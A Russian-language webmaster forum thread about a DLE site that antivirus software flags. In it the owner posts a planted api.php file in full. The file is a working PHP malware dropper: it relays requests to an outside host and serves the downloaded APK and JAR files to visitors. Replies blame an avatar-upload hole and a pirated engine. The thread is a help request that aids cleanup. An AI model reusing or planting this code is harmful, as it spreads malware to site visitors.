[DarkTower]

Здравствуйте, у меня есть сайт на DLE

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 40 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

. Недавно обнаружил, что он блокируется касперским. Блокирует будто бы все картинки на сайте. Хотелось бы узнать, может кто-нибудь сталкивался с такой проблемой и знает ли как её решить?

[Dancan]

Точно знаю что похожая проблема на сайте _swarez.net - у меня kis там ругается на различные gif картинки, png и прочее. Одним словом вечно ругается на какие-то элементы дизайна.
Проверьте свой сайт через вебсервис _http://sitecheck.sucuri.net/ и вам возможно откроется причина всех проблем с сайтом.

[DarkTower]

На хостинге обнаружил недавно добавленный сайт api.php, изменения были совсем недавно, файл удалил. Не помню точно был ли он раньше, но содержание подозрительное:

Содержание файла

<?

function urlGetContents($url) {
// Инициализация запроса
$ch = curl_init();
$IP = $_SERVER['REMOTE_ADDR'];
$headers = array('X-Forwarded-For: ' . $IP . '', 'HTTP_X_FORWARDED_FOR: ' . $IP .
'', 'REMOTE_ADDR: ' . $IP . '', 'HTTP_CLIENT_IP: ' . $IP . '');
// Установка параметров запроса
curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // no ssl verification
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // no ssl verification
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);

curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'SonyErricson';

curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_HEADER, 1);

// Выполнение
$result = curl_exec($ch);

return array('headers'=>$result);
}

$input = $_GET;
$input['u'] = urldecode($input['u']);
$url = "http://google-api-sd.net/api.php?" . http_build_query($input);
$request = urlGetContents($url);

if (isset($_GET['test']))
{
if ($headers !== false)
{
echo "Test OK";
}
else echo "Test ERROR";
exit;
}

$headers = explode("\n" , $request['headers']);
foreach ($headers as $header)
{
$temp = explode(":" , $header , 2);
if ($temp[0] == "Location")
{
$fileurl = trim($temp[1]);
break;
}
}

if (!isset($fileurl))
{
echo "Not found file";
exit();
}

$file = basename($fileurl);
if (preg_match('/\.apk/' , $file))
{
header('Content-type: application/vnd.android.package-archive');
}
else
{
header('Content-type: application/java-archive');
}

header ("Content-Disposition: attachment; filename=" . $file );

readfile($fileurl);
?>

[свернуть]

Также были картинки новые какие-то загружены буквально на днях для аватарок.

[CuxpecT]

у вас дыра в аватарах, туда прописывается редирект

попробуйте полечить этим способом

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 40 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.

потом пройдитесь до кучи ай-болитом

[DarkTower]

CuxpecT, Уязвимость устранил, а айболит не нашёл ничего.

[webrulez]

А двиган лицензионный?
Это нормальное явление если стоит null. Обновитесь первым делом до последней версии, и ставьте тока лицуху, если вам дорог ваш сайт и трафик. Вирус в любой момент может вернуться, как бы не лечили если есть дыра. В последних версиях все дыры прикрыты разработчиками.

[mwalosha]

У меня была схожая ситуация, плюс к этому нагрузка на сервер шла большая из-за чего хостер ругался. Решил проблему обновлением движка до последней версии, все наладилось.

[DarkTower]

А двиган лицензионный?

Конечно null Можно будет попробовать, сайт как-то давно уже забросил и посещаемости нет, но всё равно, может ещё реабилитирую)